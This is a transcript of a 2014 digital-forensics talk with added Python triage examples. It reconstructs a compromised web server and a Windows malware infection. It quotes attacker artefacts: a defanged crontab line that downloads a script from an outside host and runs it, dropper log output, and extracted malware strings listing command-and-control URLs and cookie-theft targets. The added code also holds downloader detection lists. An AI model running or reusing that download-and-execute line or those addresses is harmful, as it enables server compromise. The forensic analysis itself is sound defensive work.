Adventures in Digital Forensics
_xhr_
My talk about post-mortem and volatile memory forensics from the EasterHegg 2014.
Adventures in Digital Forensics
1.
Adventures in Digital Forensics
xhr, giessen.ccc.de
xhr, Easterhegg 2014

2.
$ whoami
3.
What is Digital Forensics?

4.
What the media thinks...

5.
(image: Flickr, West Midlands Police, CC-BY-2.0)

6.
What it is really about ...

7.
(image: Flickr, Naughty Architect, CC-BY-2.0)

8.
Srsly? Crawling a Shitload of Data
* Hey, that's cool. It's Big Data[TM] !!1 *

9.
Discover unknown malware
* sadly, known as well :/ *

10.
Learn new Things[TM]

11.
Two Approaches

12.
Disk Forensics

13.
Memory Forensics

14.
Post-mortem Analysis

15.
MAC Time Analysis
16.
Timestamp  MAC  User  Permissions  Path  Size
Time: M = Last Modified, A = Last Accessed, C = Last Changed, B = Birth time

17.
[...]
m...,rw-r--r--,www-data,www-data,0,"/var/tmp/checkblocks"
m...,rwxr-xr-x,www-data,www-data,0,"/var/tmp/.tar"
m...,rwxr-xr-x,www-data,www-data,0,"/var/tmp/.ew3"
m...,rwxr-xr-x,www-data,www-data,0,"/var/tmp/ew3"
m...,rwxr-xr-x,www-data,www-data,0,"/var/tmp/.bbb"
m...,rwxr-xr-x,www-data,www-data,0,"/var/tmp/apache2"
m...,rw-r--r--,www-data,www-data,0,"/var/tmp/checkfs"
m...,rw-r--r--,www-data,www-data,0,"/var/tmp/checkswap"
m...,rw-r--r--,www-data,www-data,0,"/var/tmp/e.tar.xz"
..c.,rwxr-xr-x,www-data,www-data,0,"/var/tmp/ew3"
.ac.,rwxr-xr-x,www-data,www-data,0,"/var/tmp/tar"
.a..,rwxr-xr-x,www-data,www-data,0,"/var/tmp/ew3"
ma..,rw-r--r--,www-data,www-data,0,"/tmp/.ICE-unix/log/cpuminerquark.zip"
.a..,rw-r--r--,www-data,www-data,0,"/tmp/.ICE-unix/log/include/zconf.h"
.a..,rw-r--r--,www-data,www-data,0,"/tmp/.ICE-unix/log/include/zlib.h"
.a..,rwxr-xr-x,www-data,www-data,0,"/tmp/.ICE-unix/log/bin/external-ip"
.a..,rwxr-xr-x,www-data,www-data,0,"/tmp/.ICE-unix/log/bin/upnpc"
.a..,rw-r--r--,www-data,www-data,0,"/tmp/.ICE-unix/log/lib/libminiupnpc.a"
[...]

19.
[...]
.ac.,rwxr-xr-x,www-data,www-data,0,"/var/tmp/.bbb"
.ac.,rwxr-xr-x,www-data,www-data,0,"/var/tmp/.ew3"
.ac.,rwxr-xr-x,www-data,www-data,0,"/var/tmp/.tar"
m.c.,rwxr-xr-x,www-data,www-data,0,"/tmp/.ICE-unix/cw"
m...,rwsr-sr-x,www-data,www-data,0,"/tmp/.ICE-unix/sid"
mac.,rw-r--r--,www-data,www-data,0,"/tmp/.a"
..c.,rw-------,www-data,www-data,0,"/var/www/.ssh/authorized_keys"
.a..,rwxr-xr-x,www-data,www-data,0,"/tmp/.ICE-unix/cw"
..c.,rwsr-sr-x,www-data,www-data,0,"/tmp/.ICE-unix/sid"
..c.,drwx------,www-data,www-data,0,"/var/www/.ssh"
.a..,drwx------,www-data,www-data,0,"/var/www/.ssh"
.a..,rw-r--r--,www-data,root,0,"/home/cron/www-data.tab"
m.c.,rw-------,www-data,ssh,0,"/var/spool/cron/crontabs/www-data"
.a..,rw-------,www-data,ssh,0,"/var/spool/cron/crontabs/www-data"
[...]
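Added example (not code from the talk): a Python triage pass over a mactime-style timeline like the listings above. The input rows are constructed for this example in the column layout the slides show, with a timestamp column in front; the temp-directory list, the web-server account name `www-data` and the rule names are assumptions. It flags the patterns visible in the listing (executables and hidden names under /tmp and /var/tmp, setuid/setgid bits, a rewritten authorized_keys, a crontab written for the web-server user) and then pivots on one seed path to pull every entry within a time window, which is the step that turns a single suspicious file into a sequence of attacker actions.

```python
"""Triage a mactime-style timeline and pivot around a seed file.

Added example for the MAC-time slides; not code from the talk.
Assumed input format (constructed here, not real case data):
    timestamp,MACB,perms,uid,gid,inode,"path"
MACB is mactime's four-position marker: m/a/c/b where that time changed, '.' otherwise.
"""
import csv
import io
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample timeline, loosely modelled on the slide listing.
SAMPLE = """\
2013-12-17 03:09:34,macb,rw-r--r--,www-data,www-data,0,"/tmp/.a"
2013-12-17 03:09:35,m...,rwxr-xr-x,www-data,www-data,0,"/var/tmp/.ew3"
2013-12-17 03:09:35,m...,rwxr-xr-x,www-data,www-data,0,"/var/tmp/apache2"
2013-12-17 03:09:40,m...,rwsr-sr-x,www-data,www-data,0,"/tmp/.ICE-unix/sid"
2013-12-17 03:10:02,..c.,rw-------,www-data,www-data,0,"/var/www/.ssh/authorized_keys"
2013-12-17 03:10:05,m.c.,rw-------,www-data,crontab,0,"/var/spool/cron/crontabs/www-data"
2013-12-17 03:11:00,.a..,rw-r--r--,www-data,www-data,0,"/tmp/.ICE-unix/log/include/zlib.h"
2013-12-17 09:00:00,.a..,rw-r--r--,root,root,0,"/etc/apache2/apache2.conf"
2013-12-17 09:00:01,m...,rw-r--r--,root,root,0,"/var/log/apache2/error.log"
"""

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")   # assumption: world-writable drop zones
WEB_USER = "www-data"                               # assumption: account the web server runs as


def parse_timeline(text):
    """Parse CSV rows into dicts; the quoted path column may contain commas."""
    rows = []
    for rec in csv.reader(io.StringIO(text)):
        if len(rec) != 7:
            continue
        ts, macb, perms, uid, gid, inode, path = rec
        if len(perms) == 10:          # tolerate a leading file-type character
            perms = perms[1:]
        rows.append({
            "ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "macb": macb, "perms": perms.ljust(9, "-"),
            "uid": uid, "gid": gid, "path": path,
        })
    return rows


def flag(row):
    """Return the names of the rules that fire for one timeline row."""
    path, perms, macb = row["path"], row["perms"], row["macb"]
    base = path.rsplit("/", 1)[-1]
    in_tmp = path.startswith(TEMP_DIRS)
    hidden = any(part.startswith(".") for part in path.split("/") if part)
    changed = "m" in macb or "c" in macb   # written or re-attributed, not merely read
    hits = []
    if in_tmp and "x" in perms:
        hits.append("exec-in-tmp")
    if in_tmp and hidden:
        hits.append("hidden-in-tmp")
    if perms[2] == "s" or perms[5] == "s":
        hits.append("setuid/setgid")
    if base == "authorized_keys" and changed:
        hits.append("ssh-key-added")
    if "/cron" in path and row["uid"] == WEB_USER and changed:
        hits.append("webuser-crontab")
    return hits


def triage(text):
    """Flag every row and count how often each rule fires."""
    findings = []
    for row in parse_timeline(text):
        hits = flag(row)
        if hits:
            findings.append((row["ts"], row["path"], tuple(hits)))
    counts = Counter(h for _, _, hits in findings for h in hits)
    return findings, counts


def pivot(rows, seed_path, window=timedelta(minutes=5)):
    """All rows within +/- window of the earliest entry for seed_path."""
    seeds = [r["ts"] for r in rows if r["path"] == seed_path]
    if not seeds:
        return []
    t0 = min(seeds)
    return [r for r in rows if abs(r["ts"] - t0) <= window]


if __name__ == "__main__":
    findings, counts = triage(SAMPLE)
    for ts, path, hits in findings:
        print(ts, ",".join(hits), path)
    print(dict(counts))
    for r in pivot(parse_timeline(SAMPLE), "/var/www/.ssh/authorized_keys"):
        print("pivot:", r["ts"], r["macb"], r["path"])
```

The rules are deliberately coarse: the point of a timeline is not a verdict per file but the cluster that `pivot` returns, here every write in the two minutes around the authorized_keys change, while the legitimate root activity six hours later stays out of the window.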
21.
On-disk Analysis

22.
host:/tmp/.ICE-unix/log# ls -l
total 5088
-rw-r--r-- 1 www-data www-data     238 Dec 17 16:26
drwxr-xr-x 2 www-data www-data    4096 Dec 15 04:01 bin
-rw-r--r-- 1 www-data www-data  526652 Aug 20 22:05 cpuminerquark.zip
-rw-r--r-- 1 www-data www-data  526652 Aug 20 22:05 cpuminerquark.zip.1
-rw-r--r-- 1 www-data www-data  526652 Aug 20 22:05 cpuminerquark.zip.2
-rw-r--r-- 1 www-data www-data  526652 Aug 20 22:05 cpuminerquark.zip.3
drwxr-xr-x 3 www-data www-data      22 Dec 14 12:41 doc
drwxr-xr-x 5 www-data www-data     126 Dec 15 04:01 include
drwxr-xr-x 4 www-data www-data    4096 Dec 17 16:26 lib
drwxr-xr-x 3 www-data www-data      17 Dec 14 12:41 man
-rwxr-xr-x 1 www-data www-data       0 Dec 14 03:24 rsyslogd
-rw-r--r-- 1 www-data www-data 3077358 Dec 16 16:53 sshc.tgz
drwxr-xr-x 6 www-data www-data      71 Dec 15 03:53 ssl
23.
Crontab FTW!
@weekly wget -q hxxp://221.132.37.XX/scen -O /tmp/sh; sh /tmp/sh; rm -rd /tmp/sh

24.
Log Files

25.
[error] [client X] 20XXXXXX 03:09:34 hxxp://93.174.4.XX/xmrl/d1e.txt
[error] [client X] Connecting to 93.174.4.XX:80...
[error] [client X] connected.
[error] [client X] HTTP request sent, awaiting response...
[error] [client X] 200 OK
[...]
[error] [client X] Saving to: `d1e.txt'
[error] [client X] 20XXXXXX 03:09:34 (208 KB/s) `d1e.txt' saved [16732/16732]
[error] [client X]   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
[error] [client X]                                  Dload  Upload   Total   Spent    Left  Speed
[error] [client X]   6 16732    6  1180    0     0  10717      0  0:00:01 --:--:--  0:00:01 10717
[error] [client X] 100 16732  100 16732    0     0  76812      0 --:--:-- --:--:-- --:--:--  141k
[error] [client X] sh: lwp-download: command not found
[error] [client X] sh: fetch: command not found
[error] [client X] kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
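Added example, not the talk's code: the crontab entry and the error-log excerpt above carry one signature, a script that tries several download tools in turn and runs whatever it fetched. Apache sends the stderr of a CGI or PHP child to its error log, which is why wget's progress output and the shell's "command not found" lines are visible there. The Python below pulls those indicators out of constructed sample lines (client and server addresses are documentation-range placeholders; the defanged `hxxp` scheme is kept on output so the report stays unclickable); the downloader list, the noise markers and the record field names are assumptions.

```python
"""Extract download-and-execute indicators from a crontab and an Apache error log.

Added example for the crontab and log-file slides; not code from the talk.
All sample lines are constructed; addresses are documentation-range placeholders.
"""
import re
from collections import defaultdict

# Constructed crontab in the spirit of the slide: fetch a script weekly, run it, delete it.
CRONTAB = """\
# m h dom mon dow command
@weekly wget -q hxxp://203.0.113.10/scen -O /tmp/sh; sh /tmp/sh; rm -rf /tmp/sh
0 3 * * * /usr/bin/php /var/www/cron/cleanup.php
"""

# Constructed Apache error-log excerpt. stderr of a CGI/PHP child lands here,
# so wget's progress output and the shell's complaints about missing tools are visible.
ERROR_LOG = """\
[Tue Dec 17 03:09:34 2013] [error] [client 198.51.100.7] --2013-12-17 03:09:34--  hxxp://203.0.113.20/xmrl/d1e.txt
[Tue Dec 17 03:09:34 2013] [error] [client 198.51.100.7] Connecting to 203.0.113.20:80... connected.
[Tue Dec 17 03:09:34 2013] [error] [client 198.51.100.7] HTTP request sent, awaiting response... 200 OK
[Tue Dec 17 03:09:34 2013] [error] [client 198.51.100.7] Saving to: `d1e.txt'
[Tue Dec 17 03:09:35 2013] [error] [client 198.51.100.7] sh: lwp-download: command not found
[Tue Dec 17 03:09:35 2013] [error] [client 198.51.100.7] sh: fetch: command not found
[Tue Dec 17 03:09:35 2013] [error] [client 198.51.100.7] kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
[Tue Dec 17 03:15:00 2013] [error] [client 192.0.2.44] File does not exist: /var/www/favicon.ico
"""

DOWNLOADERS = ("wget", "curl", "lwp-download", "fetch")           # assumption: tools droppers cycle through
INTERPRETERS = r"\b(?:sh|bash|perl|python|chmod \+x)\b"            # something that runs what was fetched
NOISE = ("Connecting to", "HTTP request sent", "Saving to:", "saved [",
         "% Received", "kill: usage:")                              # downloader/dropper chatter
URL_RE = re.compile(r"""\b(?:h[xt]{2}ps?)://[^\s'"`<>]+""", re.I)  # matches http and defanged hxxp
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
NOT_FOUND_RE = re.compile(r"\bsh: ([\w.\-]+): command not found")
CLIENT_RE = re.compile(r"\[client ([0-9a-fA-F.:]+)\]")


def defang(url):
    """Keep IOCs unclickable in reports: http -> hxxp."""
    return re.sub(r"^http", "hxxp", url, flags=re.I)


def scan_crontab(text):
    """Crontab lines that download something and hand it to an interpreter."""
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        uses_downloader = any(re.search(r"\b%s\b" % re.escape(t), line) for t in DOWNLOADERS)
        if uses_downloader and re.search(INTERPRETERS, line):
            hits.append({"line": line, "urls": [defang(u) for u in URL_RE.findall(line)]})
    return hits


def scan_error_log(text):
    """Group dropper artefacts per requesting client; the client IP is never reported as a remote host."""
    by_client = defaultdict(lambda: {"lines": 0, "urls": set(), "remote_hosts": set(), "missing_tools": []})
    for line in text.splitlines():
        m = CLIENT_RE.search(line)
        if not m:
            continue
        client, msg = m.group(1), line[m.end():]
        urls = URL_RE.findall(msg)
        missing = NOT_FOUND_RE.search(msg)
        if not (urls or missing or any(k in msg for k in NOISE)):
            continue
        rec = by_client[client]
        rec["lines"] += 1
        rec["urls"].update(defang(u) for u in urls)
        rec["remote_hosts"].update(ip for ip in IP_RE.findall(msg) if ip != client)
        if missing:
            rec["missing_tools"].append(missing.group(1))
    return dict(by_client)


def summarize(crontab_text, log_text):
    """One IOC list across both sources, plus the clients that triggered dropper activity."""
    cron, log = scan_crontab(crontab_text), scan_error_log(log_text)
    iocs = {u for h in cron for u in h["urls"]} | {u for r in log.values() for u in r["urls"]}
    hosts = {h for r in log.values() for h in r["remote_hosts"]}
    return {"cron_hits": len(cron), "clients": sorted(log), "iocs": sorted(iocs), "hosts": sorted(hosts)}


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(CRONTAB, ERROR_LOG), indent=2))
```

Two or more entries in `missing_tools` for one client is the tell: a script cycling through wget, curl, lwp-download and fetch until one works. The client address is what you pivot on next in the access log, since it identifies the request that reached the vulnerable script in the first place.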
29.
Write Remote Logs!!1

30.
And use Smart Indexing
loghost:/syslog/live $ du -hs
4.5T    .
:)

31.
Memory Forensics 101

32.
Mem dump == IDDQD

33.
Linux → Windows

34.
Details about the Victim
Determining profile based on KDBG search...
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                      PAE type : PAE
                           DTB : 0x28a000L
                          KDBG : 0x80545ce0
          Number of Processors : 1
     Image Type (Service Pack) : 3
$ file ram.elf
ram.elf: ELF 64-bit LSB core file x86-64, version 1 (SYSV)
$ ls -l ram.elf
-rw------- 1 xhr xhr 293M Apr 19 15:29 ram.elf

35.
Check Networking

36.
Offset(P)  Local Address    Remote Address       Pid
0x017af800 10.0.2.15:2859   4.26.224.125:80      360
0x017c3008 10.0.2.15:2841   4.26.224.125:80      360
0x017c3270 10.0.2.15:2845   68.232.35.169:80     360
0x017c42c0 10.0.2.15:2771   31.13.64.145:443     360
0x017c45d0 10.0.2.15:2770   23.37.37.163:80      360
0x017d2aa8 10.0.2.15:2857   4.26.224.125:80      360
0x017d75c0 10.0.2.15:2846   162.159.243.176:80   360
0x017d79e8 10.0.2.15:2773   2.18.162.110:443     360
0x017d7cf8 10.0.2.15:2772   95.100.249.129:80    360
0x017d8d28 10.0.2.15:2858   4.26.224.125:80      360
0x017db9e8 10.0.2.15:2778   131.253.37.30:80     360
0x017dbcf8 10.0.2.15:2867   8.21.198.146:80      360
0x017ddbe8 10.0.2.15:2769   23.37.37.163:80      360
0x017de6e8 10.0.2.15:2761   91.103.137.3:80      360
0x01803968 10.0.2.15:2754   23.43.118.238:80     360
0x01803e68 10.0.2.15:2757   173.194.69.139:80    3460
0x0195e458 10.0.2.15:2854   31.192.116.24:80     360

38.
Check IE History

39.
admin@about:Home
admin@http://127.0.0.1:1088/app/index.html
admin@http://ccc.de
admin@http://ccc.de/de/rss/updates.rdf
admin@http://ccc.de/de/rss/updates.xml
admin@http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0
admin@http://edpn.ebay.com/engagement?INIT=575302488402|22076974|707189966101462|1|0|1||http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0
admin@http://go.microsoft.com/fwlink/?LinkID=121792
admin@http://home.microsoft.com
admin@https://download-installer.cdn.mozilla.net/pub/firefox/releases/26.0/win32/en-US/Firefox%20Setup%20Stub%2026.0.exe
admin@http://update.microsoft.com/favicon.ico
admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx
admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx?ln=en-us
admin@http://update.microsoft.com/microsoftupdate/v6/resultslist.aspx?ln=en-us&id=6
admin@http://windowsupdate.microsoft.com/favicon.ico
admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx
admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx?ln=en-us
admin@http://windowsupdate.microsoft.com/windowsupdate/v6/resultslist.aspx?ln=en-us&id=6
admin@http://windowsupdate.microsoft.com/windowsupdate/v6/splash.aspx?ln=en-us&page=8
admin@http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
admin@http://www.mozilla.org/en-US
admin@http://www.mozilla.org/en-US/products/download.html?product=firefox-stub&os=win&lang=en-US
admin@http://www.msn.com
admin@http://www.youporn.com/rss
admin@res://ief
admin@res://ieframe.dll/tabswelcome.htm
40.
Any Malicious Processes?

41.
Offset(V)  Name             PID   PPID  Thds  Hnds
0x819cca00 System             4      0    53   359
0x81843930 SMSS.EXE         324      4     3    19
0x8170dda0 CSRSS.EXE        608    324     9   433
0x8171c1c8 WINLOGON.EXE     632    324    17   504
0x8170ba98 SERVICES.EXE     676    632    15   258
0x81706a98 LSASS.EXE        688    632    24   369
0x8196e560 VBOXSERVICE.EXE  840    676     8   105
0x81793da0 SVCHOST.EXE      884    676    18   201
0x8170db20 SVCHOST.EXE      972    676     9   248
0x81823990 SVCHOST.EXE     1092    676    77  1492
0x81745c18 SVCHOST.EXE     1140    676     6    84
0x81703560 SVCHOST.EXE     1176    676    12   172
0x817d8730 EXPLORER.EXE    1548   1496    21   672
0x8183caf0 SPOOLSV.EXE     1664    676    10   117
0x81738da0 VBOXTRAY.EXE    1860   1548    10   936
0x81724470 CTFMON.EXE      1872   1548     4    94
0x816f0650 SVCHOST.EXE      584    676     4   105
0x817f4da0 ALG.EXE          460    676     6   106
0x819215d0 firefox.exe     3460   1548    36   462
0x817313c0 IEXPLORE.EXE    4008   1548    16   412
0x81706228 IEXPLORE.EXE     360   4008    29   994
0x81870888 UPS_COLLECT_LET 1156   1548     4    34

43.
Offset(V)  Name             PID   PPID  Thds  Hnds
0x819cca00 System             4      0    53   359
0x81843930 SMSS.EXE         324      4     3    19
0x8170dda0 CSRSS.EXE        608    324    10   435
0x8171c1c8 WINLOGON.EXE     632    324    17   504
0x8170ba98 SERVICES.EXE     676    632    15   258
0x81706a98 LSASS.EXE        688    632    24   369
0x8196e560 VBOXSERVICE.EXE  840    676     8   105
0x81793da0 SVCHOST.EXE      884    676    18   201
0x8170db20 SVCHOST.EXE      972    676     9   248
0x81823990 SVCHOST.EXE     1092    676    77  1492
0x81745c18 SVCHOST.EXE     1140    676     6    84
0x81703560 SVCHOST.EXE     1176    676    12   172
0x817d8730 EXPLORER.EXE    1548   1496    21   672
0x8183caf0 SPOOLSV.EXE     1664    676    10   117
0x81738da0 VBOXTRAY.EXE    1860   1548    10   939
0x81724470 CTFMON.EXE      1872   1548     4    94
0x816f0650 SVCHOST.EXE      584    676     4   105
0x817f4da0 ALG.EXE          460    676     6   106
0x819215d0 firefox.exe     3460   1548    36   462
0x817313c0 IEXPLORE.EXE    4008   1548    16   412
0x81706228 IEXPLORE.EXE     360   4008    29   994
0x81887620 KB01065453.exe  3564   1156     1    15
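Added example (not from the talk and not part of Volatility): the connections and pslist listings above are plain text, so the triage the slides do by eye can be scripted: parentage that does not fit Windows XP, a process name nobody recognises, a child spawned by that process, a new entry between two captures, and the sockets that belong to each PID. The two pslist snapshots and the connections table below are constructed, trimmed-down samples in the column layout of Volatility 2's pslist and connections plugins, modelled on the slides; the expected-parent map, the allowlist and the 203.0.113.9:8080 socket attributed to the new process are assumptions.

```python
"""Script the by-eye triage of Volatility pslist/connections text output.

Added example for the memory-forensics slides; not code from the talk or from
the Volatility project. Listings are constructed, trimmed samples in the column
layout of Volatility 2's pslist and connections plugins, modelled on the slides.
"""
import re
from collections import defaultdict

PSLIST_BEFORE = """\
Offset(V)  Name                    PID   PPID   Thds     Hnds
---------- -------------------- ------ ------ ------ --------
0x819cca00 System                    4      0     53      359
0x81843930 SMSS.EXE                324      4      3       19
0x8170dda0 CSRSS.EXE               608    324      9      433
0x8171c1c8 WINLOGON.EXE            632    324     17      504
0x8170ba98 SERVICES.EXE            676    632     15      258
0x81706a98 LSASS.EXE               688    632     24      369
0x81793da0 SVCHOST.EXE             884    676     18      201
0x817d8730 EXPLORER.EXE           1548   1496     21      672
0x819215d0 firefox.exe            3460   1548     36      462
0x817313c0 IEXPLORE.EXE           4008   1548     16      412
0x81706228 IEXPLORE.EXE            360   4008     29      994
0x81870888 UPS_COLLECT_LET        1156   1548      4       34
"""
# Second capture a little later: one new process, child of UPS_COLLECT_LET.
PSLIST_AFTER = PSLIST_BEFORE + "0x81887620 KB01065453.exe         3564   1156      1       15\n"

# The 203.0.113.9:8080 row is a constructed placeholder for the new process's socket.
CONNECTIONS = """\
Offset(P)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x017c42c0 10.0.2.15:2771            31.13.64.145:443          360
0x01803e68 10.0.2.15:2757            173.194.69.139:80         3460
0x0195e458 10.0.2.15:2854            203.0.113.9:8080          3564
"""

PS_RE = re.compile(r"^(0x[0-9a-f]+)\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)", re.I)
CONN_RE = re.compile(r"^0x[0-9a-f]+\s+(\S+)\s+(\S+)\s+(\d+)", re.I)

# Assumption: Windows XP workstation parentage (lowercased names).
EXPECTED_PARENT = {
    "smss.exe": "system", "csrss.exe": "smss.exe", "winlogon.exe": "smss.exe",
    "services.exe": "winlogon.exe", "lsass.exe": "winlogon.exe",
    "svchost.exe": "services.exe", "spoolsv.exe": "services.exe", "alg.exe": "services.exe",
}
# Assumption: names an analyst would accept on this box without a second look.
KNOWN = set(EXPECTED_PARENT) | {"system", "explorer.exe", "ctfmon.exe", "vboxservice.exe",
                                "vboxtray.exe", "firefox.exe", "iexplore.exe"}


def parse_pslist(text):
    procs = {}
    for line in text.splitlines():
        m = PS_RE.match(line)
        if m:
            _, name, pid, ppid, thds, hnds = m.groups()
            procs[int(pid)] = {"name": name, "ppid": int(ppid), "thds": int(thds), "hnds": int(hnds)}
    return procs


def parse_connections(text):
    conns = []
    for line in text.splitlines():
        m = CONN_RE.match(line)
        if m:
            local, remote, pid = m.groups()
            conns.append({"local": local, "remote": remote, "pid": int(pid)})
    return conns


def lineage(procs, pid):
    """Names from pid up to the root, stopping at a missing parent or a cycle."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid]["name"])
        pid = procs[pid]["ppid"]
    return chain


def suspicious(procs):
    """{pid: reasons} for processes with a wrong parent, an unknown name, or an unknown parent."""
    out = defaultdict(list)
    for pid, p in procs.items():
        name, parent = p["name"].lower(), procs.get(p["ppid"])
        expected = EXPECTED_PARENT.get(name)
        if expected and (parent is None or parent["name"].lower() != expected):
            out[pid].append("parent should be " + expected)
        if name not in KNOWN:
            out[pid].append("not in allowlist")
        if parent is not None and parent["name"].lower() not in KNOWN:
            out[pid].append("spawned by unknown process " + parent["name"])
    return dict(out)


def diff_snapshots(before, after):
    return {"new": sorted(set(after) - set(before)), "gone": sorted(set(before) - set(after))}


def annotate_connections(procs, conns):
    """Join sockets to their owning process and mark the ones owned by a flagged process."""
    flagged = suspicious(procs)
    return [{**c, "name": procs[c["pid"]]["name"] if c["pid"] in procs else "?",
             "lineage": " <- ".join(lineage(procs, c["pid"])), "flagged": c["pid"] in flagged}
            for c in conns]


if __name__ == "__main__":
    before, after = parse_pslist(PSLIST_BEFORE), parse_pslist(PSLIST_AFTER)
    print("new since first capture:", diff_snapshots(before, after)["new"])
    for pid, reasons in suspicious(after).items():
        print(pid, after[pid]["name"], reasons, "|", " <- ".join(lineage(after, pid)))
    for row in annotate_connections(after, parse_connections(CONNECTIONS)):
        print(("!! " if row["flagged"] else "   ") + row["name"], row["local"], "->", row["remote"])
```

The join is what makes the connections table readable: on the slide, every socket but one belongs to the IEXPLORE.EXE child (PID 360) and the remaining one to firefox.exe (3460), and a socket owned by a process whose lineage runs through an unknown parent is the one to dump first.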
44.
Process Dump

45.
(image slide)

46.
Putting it into IDA Pro
* Having a Pro license totally rocks :) *

47.
Detailz kthxbye!
000000011410 000000411410 0 http://113.130.65.77:8080/mx5/C/in/
000000011458 000000411458 0 http://199.71.212.78:8080/mx5/C/in/
0000000114A0 0000004114A0 0 http://211.191.168.98:8080/mx5/C/in/
0000000114F0 0000004114F0 0 http://195.250.139.10:8080/mx5/C/in/
000000011540 000000411540 0 http://173.224.208.60:8080/mx5/C/in/
000000011590 000000411590 0 http://46.51.218.71:8080/mx5/C/in/
0000000115D8 0000004115D8 0 http://89.97.55.33:8080/mx5/C/in/
000000011620 000000411620 0 http://71.89.140.153:8080/mx5/C/in/
000000011668 000000411668 0 http://195.111.72.46:8080/mx5/C/in/
0000000116B0 0000004116B0 0 http://84.53.217.109:8080/mx5/C/in/
0000000116F8 0000004116F8 0 http://78.46.64.17:8080/mx5/C/in/
0000000111F8 0000004111F8 0 Software\Microsoft\Windows NT\C%08X
000000011254 000000411254 0 Mozilla\Firefox\Profiles
000000011288 000000411288 0 cookies.*
00000001129C 00000041129C 0 Macromedia
0000000112BC 0000004112BC 0 firefox.exe
0000000112D4 0000004112D4 0 explorer.exe
000000011C60 000000411C60 0 Software\Microsoft\Windows NT\S%08X
000000011CEB 000000411CEB 0 sKB%08d.exe
000000011D08 000000411D08 0 Software\Microsoft\Windows\CurrentVersion\Run

48.
Selected Tools

49.
The Sleuth Kit
http://www.sleuthkit.org

50.
The Volatility Framework
https://code.google.com/p/volatility/

51.
Fin!

52.
Q & A
xhr, giessen.ccc.de, @_xhr_